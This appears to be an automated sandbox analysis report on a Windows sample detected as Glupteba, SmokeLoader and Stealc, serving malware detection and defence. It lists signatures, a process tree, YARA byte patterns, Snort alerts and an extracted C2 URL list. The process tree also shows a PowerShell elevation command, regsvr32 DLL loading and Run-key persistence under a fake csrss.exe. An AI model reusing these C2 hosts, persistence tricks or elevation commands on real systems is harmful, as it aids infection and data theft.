Windows Analysis Report
ccQGH1mKws.exe

Overview

General Information

Sample name:ccQGH1mKws.exe
renamed because original name is a hash value
Original sample name:29c6c5ed9d80c710d6b1df200d90e388.exe
Analysis ID:1389368
MD5:29c6c5ed9d80c710d6b1df200d90e388
SHA1:4b2d34d2623e4a611a0f175f0073184de2eeab3d
SHA256:9fa5c3ae48914ecc23baac692f938f031388692048e10e2154a61dca492e22f1
Tags:exe

Detection

Glupteba, SmokeLoader, Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
UAC bypass detected (Fodhelper)
Yara detected Glupteba
Yara detected SmokeLoader
Yara detected Stealc
Yara detected UAC Bypass using CMSTP
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to infect the boot sector
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Drops PE files with benign system names
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious Process Parents
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: System File Execution Location Anomaly
Suspicious powershell command line found
Tries to detect sandboxes / dynamic malware analysis system (file name check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to resolve many domain names, but no domain seems valid
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to many different domains
Connects to several IPs in different countries
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • ccQGH1mKws.exe (PID: 1648 cmdline: C:\Users\user\Desktop\ccQGH1mKws.exe MD5: 29C6C5ED9D80C710D6B1DF200D90E388)
    • explorer.exe (PID: 3504 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • 8837.exe (PID: 4120 cmdline: C:\Users\user\AppData\Local\Temp\8837.exe MD5: 151E9EC4F0355D2F131B871671BD5E20)
        • 8837.exe (PID: 4984 cmdline: C:\Users\user\AppData\Local\Temp\8837.exe MD5: 151E9EC4F0355D2F131B871671BD5E20)
      • 8E91.exe (PID: 4248 cmdline: C:\Users\user\AppData\Local\Temp\8E91.exe MD5: 50F2E865696BEEB3C20E1F05DC72D03C)
        • WerFault.exe (PID: 2656 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 1396 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • 93D2.exe (PID: 1624 cmdline: C:\Users\user\AppData\Local\Temp\93D2.exe MD5: 1996A23C7C764A77CCACF5808FEC23B0)
      • regsvr32.exe (PID: 3608 cmdline: regsvr32 /s C:\Users\user\AppData\Local\Temp\97EA.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
        • regsvr32.exe (PID: 4588 cmdline: /s C:\Users\user\AppData\Local\Temp\97EA.dll MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • A6A0.exe (PID: 4460 cmdline: C:\Users\user\AppData\Local\Temp\A6A0.exe MD5: 7176404D8394DECDC9399BB62C01A2FF)
        • A6A0.tmp (PID: 5252 cmdline: "C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmp" /SL5="$20424,8085089,54272,C:\Users\user\AppData\Local\Temp\A6A0.exe" MD5: 426607EDCEEC6A310076FA659B073D1D)
          • A6A0.exe (PID: 2284 cmdline: "C:\Users\user\AppData\Local\Temp\A6A0.exe" /SPAWNWND=$20422 /NOTIFYWND=$20424 MD5: 7176404D8394DECDC9399BB62C01A2FF)
            • A6A0.tmp (PID: 1676 cmdline: "C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp" /SL5="$20434,8085089,54272,C:\Users\user\AppData\Local\Temp\A6A0.exe" /SPAWNWND=$20422 /NOTIFYWND=$20424 MD5: 426607EDCEEC6A310076FA659B073D1D)
              • anyburnfree.exe (PID: 6756 cmdline: "C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe" -i MD5: EB428F0ECD8AD6907A62E6A0ACEAB53F)
              • anyburnfree.exe (PID: 5428 cmdline: "C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe" -s MD5: EB428F0ECD8AD6907A62E6A0ACEAB53F)
      • csrss.exe (PID: 6004 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: 151E9EC4F0355D2F131B871671BD5E20)
        • csrss.exe (PID: 6572 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: 151E9EC4F0355D2F131B871671BD5E20)
      • BB62.exe (PID: 2720 cmdline: C:\Users\user\AppData\Local\Temp\BB62.exe MD5: CEAE65EE17FF158877706EDFE2171501)
        • InstallSetup4.exe (PID: 2016 cmdline: "C:\Users\user\AppData\Local\Temp\InstallSetup4.exe" MD5: 28B72E7425D6D224C060D3CF439C668C)
          • BroomSetup.exe (PID: 2936 cmdline: C:\Users\user\AppData\Local\Temp\BroomSetup.exe MD5: 5E94F0F6265F9E8B2F706F1D46BBD39E)
            • cmd.exe (PID: 3788 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 6296 cmdline: chcp 1251 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
        • FourthX.exe (PID: 7144 cmdline: "C:\Users\user\AppData\Local\Temp\FourthX.exe" MD5: B03886CB64C04B828B6EC1B2487DF4A4)
          • powershell.exe (PID: 5912 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 5408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • FourthX.exe (PID: 7020 cmdline: "C:\Users\user\AppData\Local\Temp\FourthX.exe" MD5: B03886CB64C04B828B6EC1B2487DF4A4)
      • DC49.exe (PID: 2028 cmdline: C:\Users\user\AppData\Local\Temp\DC49.exe MD5: BA79778FB5C76EE86A3719452732A68B)
  • afratej (PID: 4516 cmdline: C:\Users\user\AppData\Roaming\afratej MD5: 29C6C5ED9D80C710D6B1DF200D90E388)
  • 93D2.exe (PID: 2036 cmdline: "C:\Users\user\AppData\Local\Temp\93D2.exe" MD5: 1996A23C7C764A77CCACF5808FEC23B0)
  • svchost.exe (PID: 2688 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 3412 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4248 -ip 4248 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 4980 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Name:Glupteba
Description:Glupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.
Attribution:No Attribution
Blogpost URLs:
Link:https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba

Name:SmokeLoader
Description:The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404 but still contains data in the response body.
Attribution:SMOKY SPIDER
Blogpost URLs:
Link:https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Name:Stealc
Description:Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution:No Attribution
Blogpost URLs:
Link:https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"Version": 2022, "C2 list": ["http://goodfooggooftool.net/index.php", "http://sulugilioiu19.net/index.php", "http://selebration17io.io/index.php", "http://vacantion18ffeu.cc/index.php", "http://valarioulinity1.net/index.php", "http://buriatiarutuhuob.net/index.php", "http://cassiosssionunu.me/index.php"]}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\BB62.exe | MALWARE_Win_DLInjector04 | Detects downloader / injector | ditekSHen
  • 0x8ad454:$s1: Runner
  • 0x8ad5b9:$s3: RunOnStartup
  • 0x8ad468:$a1: Antis
  • 0x8ad495:$a2: antiVM
  • 0x8ad49c:$a3: antiSandbox
  • 0x8ad4a8:$a4: antiDebug
  • 0x8ad4b2:$a5: antiEmulator
  • 0x8ad4bf:$a6: enablePersistence
  • 0x8ad4d1:$a7: enableFakeError
  • 0x8ad5e2:$a8: DetectVirtualMachine
  • 0x8ad607:$a9: DetectSandboxie
  • 0x8ad632:$a10: DetectDebugger
  • 0x8ad641:$a11: CheckEmulator
C:\Users\user\AppData\Local\Temp\BroomSetup.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security

Source | Rule | Description | Author | Strings
00000001.00000002.1549966457.0000000000529000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0x331e:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000A.00000002.1813537584.0000000000413000.00000004.00000001.01000000.0000000A.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000018.00000002.1889731561.0000000002800000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000006.00000002.1793881515.00000000006D0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000006.00000002.1793881515.00000000006D0000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown
  • 0x6a4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
(5 of 23 entries shown)
Source | Rule | Description | Author | Strings
39.3.DC49.exe.2c50000.0.raw.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
39.2.DC49.exe.2c40e67.1.raw.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
39.2.DC49.exe.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
10.2.93D2.exe.400000.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
10.2.93D2.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen
  • 0x10000:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x100a0:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x10170:$s2: Elevation:Administrator!new:
(5 of 6 entries shown)

                  System Summary

                  Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\8837.exe, ProcessId: 4984, TargetFilename: C:\ProgramData\Drivers\csrss.exe
                  Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\ProgramData\Drivers\csrss.exe" , CommandLine: "C:\ProgramData\Drivers\csrss.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\Drivers\csrss.exe, NewProcessName: C:\ProgramData\Drivers\csrss.exe, OriginalFileName: C:\ProgramData\Drivers\csrss.exe, ParentCommandLine: "C:\ProgramData\Drivers\csrss.exe" , ParentImage: C:\ProgramData\Drivers\csrss.exe, ParentProcessId: 6004, ParentProcessName: csrss.exe, ProcessCommandLine: "C:\ProgramData\Drivers\csrss.exe" , ProcessId: 6572, ProcessName: csrss.exe
                  Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs, CommandLine|base64offset|contains: J, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\FourthX.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\FourthX.exe, ParentProcessId: 7144, ParentProcessName: FourthX.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs, ProcessId: 5912, ProcessName: powershell.exe
                  Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: "C:\ProgramData\Drivers\csrss.exe" , CommandLine: "C:\ProgramData\Drivers\csrss.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\Drivers\csrss.exe, NewProcessName: C:\ProgramData\Drivers\csrss.exe, OriginalFileName: C:\ProgramData\Drivers\csrss.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3504, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\ProgramData\Drivers\csrss.exe" , ProcessId: 6004, ProcessName: csrss.exe
                  Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\ProgramData\Drivers\csrss.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\8837.exe, ProcessId: 4984, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CSRSS
                  Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\Users\user\AppData\Roaming\afratej, CommandLine: C:\Users\user\AppData\Roaming\afratej, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\afratej, NewProcessName: C:\Users\user\AppData\Roaming\afratej, OriginalFileName: C:\Users\user\AppData\Roaming\afratej, ParentCommandLine: , ParentImage: , ParentProcessId: 1124, ProcessCommandLine: C:\Users\user\AppData\Roaming\afratej, ProcessId: 4516, ProcessName: afratej
                  Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\ProgramData\Drivers\csrss.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\8837.exe, ProcessId: 4984, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\CSRSS
                  Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs, CommandLine|base64offset|contains: J, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\FourthX.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\FourthX.exe, ParentProcessId: 7144, ParentProcessName: FourthX.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs, ProcessId: 5912, ProcessName: powershell.exe
                  Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 2688, ProcessName: svchost.exe
                  Timestamp:02/08/24-19:09:48.378633
                  Source IP:192.168.2.9
                  Destination IP:185.196.8.22
                  SID:2049467
                  Source Port:49848
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:09:44.987581
                  Source IP:192.168.2.9
                  Destination IP:185.196.8.22
                  SID:2049467
                  Source Port:49842
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:08:05.573279
                  Source IP:192.168.2.9
                  Destination IP:104.21.83.220
                  SID:2050578
                  Source Port:49724
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:09:26.979597
                  Source IP:192.168.2.9
                  Destination IP:91.215.85.120
                  SID:2039103
                  Source Port:49805
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:09:43.381058
                  Source IP:192.168.2.9
                  Destination IP:185.196.8.22
                  SID:2049467
                  Source Port:49839
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:10:13.584334
                  Source IP:192.168.2.9
                  Destination IP:185.196.8.22
                  SID:2049467
                  Source Port:49894
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:09:53.283760
                  Source IP:192.168.2.9
                  Destination IP:185.196.8.22
                  SID:2049467
                  Source Port:49857
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:09:49.817059
                  Source IP:192.168.2.9
                  Destination IP:91.215.85.120
                  SID:2039103
                  Source Port:49851
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:09:55.041923
                  Source IP:192.168.2.9
                  Destination IP:91.215.85.120
                  SID:2039103
                  Source Port:49860
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:10:17.403786
                  Source IP:192.168.2.9
                  Destination IP:185.196.8.22
                  SID:2049467
                  Source Port:49903
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:09:33.949203
                  Source IP:192.168.2.9
                  Destination IP:91.215.85.120
                  SID:2039103
                  Source Port:49823
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:09:15.459025
                  Source IP:192.168.2.9
                  Destination IP:185.196.8.22
                  SID:2049467
                  Source Port:49781
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:10:03.126917
                  Source IP:192.168.2.9
                  Destination IP:185.196.8.22
                  SID:2049467
                  Source Port:49875
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:09:58.797137
                  Source IP:192.168.2.9
                  Destination IP:185.196.8.22
                  SID:2049467
                  Source Port:49866
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:10:23.285920
                  Source IP:192.168.2.9
                  Destination IP:185.196.8.22
                  SID:2049467
                  Source Port:58448
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:09:13.070039
                  Source IP:192.168.2.9
                  Destination IP:185.196.8.22
                  SID:2049467
                  Source Port:49777
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:09:19.898015
                  Source IP:192.168.2.9
                  Destination IP:185.196.8.22
                  SID:2049467
                  Source Port:49790
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:08:02.058928
                  Source IP:192.168.2.9
                  Destination IP:1.1.1.1
                  SID:2050564
                  Source Port:52640
                  Destination Port:53
                  Protocol:UDP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:10:01.244716
                  Source IP:192.168.2.9
                  Destination IP:185.196.8.22
                  SID:2049467
                  Source Port:49870
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:10:21.597294
                  Source IP:192.168.2.9
                  Destination IP:185.196.8.22
                  SID:2049467
                  Source Port:55644
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:10:07.960153
                  Source IP:192.168.2.9
                  Destination IP:185.196.8.22
                  SID:2049467
                  Source Port:49884
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:08:00.180755
                  Source IP:192.168.2.9
                  Destination IP:91.215.85.120
                  SID:2039103
                  Source Port:49710
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:09:30.889842
                  Source IP:192.168.2.9
                  Destination IP:185.196.8.22
                  SID:2049467
                  Source Port:49814
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:09:55.192469
                  Source IP:192.168.2.9
                  Destination IP:185.196.8.22
                  SID:2049467
                  Source Port:49861
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:09:08.703004
                  Source IP:192.168.2.9
                  Destination IP:185.196.8.22
                  SID:2049467
                  Source Port:49769
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:09:31.259796
                  Source IP:192.168.2.9
                  Destination IP:91.215.85.120
                  SID:2039103
                  Source Port:49815
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:08:55.741638
                  Source IP:192.168.2.9
                  Destination IP:189.232.12.90
                  SID:2039103
                  Source Port:49761
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:09:25.351895
                  Source IP:192.168.2.9
                  Destination IP:185.196.8.22
                  SID:2049467
                  Source Port:49800
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:10:15.587384
                  Source IP:192.168.2.9
                  Destination IP:185.196.8.22
                  SID:2049467
                  Source Port:49899
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:09:53.913966
                  Source IP:192.168.2.9
                  Destination IP:185.196.8.22
                  SID:2049467
                  Source Port:49858
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:09:27.119106
                  Source IP:192.168.2.9
                  Destination IP:185.196.8.22
                  SID:2049467
                  Source Port:49806
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:10:03.749517
                  Source IP:192.168.2.9
                  Destination IP:185.196.8.22
                  SID:2049467
                  Source Port:49876
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:09:09.317682
                  Source IP:192.168.2.9
                  Destination IP:185.196.8.22
                  SID:2049467
                  Source Port:49771
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:09:33.946899
                  Source IP:192.168.2.9
                  Destination IP:185.196.8.22
                  SID:2049467
                  Source Port:49824
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:09:18.142809
                  Source IP:192.168.2.9
                  Destination IP:185.196.8.22
                  SID:2049467
                  Source Port:49787
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:08:03.774246
                  Source IP:192.168.2.9
                  Destination IP:172.67.199.120
                  SID:2050572
                  Source Port:49720
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:09:47.755322
                  Source IP:192.168.2.9
                  Destination IP:185.196.8.22
                  SID:2049467
                  Source Port:49847
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:09:58.184006
                  Source IP:192.168.2.9
                  Destination IP:185.196.8.22
                  SID:2049467
                  Source Port:49865
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:09:12.488524
                  Source IP:192.168.2.9
                  Destination IP:185.196.8.22
                  SID:2049467
                  Source Port:49776
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:02/08/24-19:08:03.594306
                  Source IP:192.168.2.9
                  Destination IP:1.1.1.1
                  SID:2050565
                  Source Port:53481
                  Destination Port:53
                  Protocol:UDP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9189.232.12.9049744802039103 02/08/24-19:08:42.322004
                  SID:2039103
                  Source Port:49744
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249819802049467 02/08/24-19:09:32.072105
                  SID:2049467
                  Source Port:49819
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249816802049467 02/08/24-19:09:31.489254
                  SID:2049467
                  Source Port:49816
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249782802049467 02/08/24-19:09:16.038969
                  SID:2049467
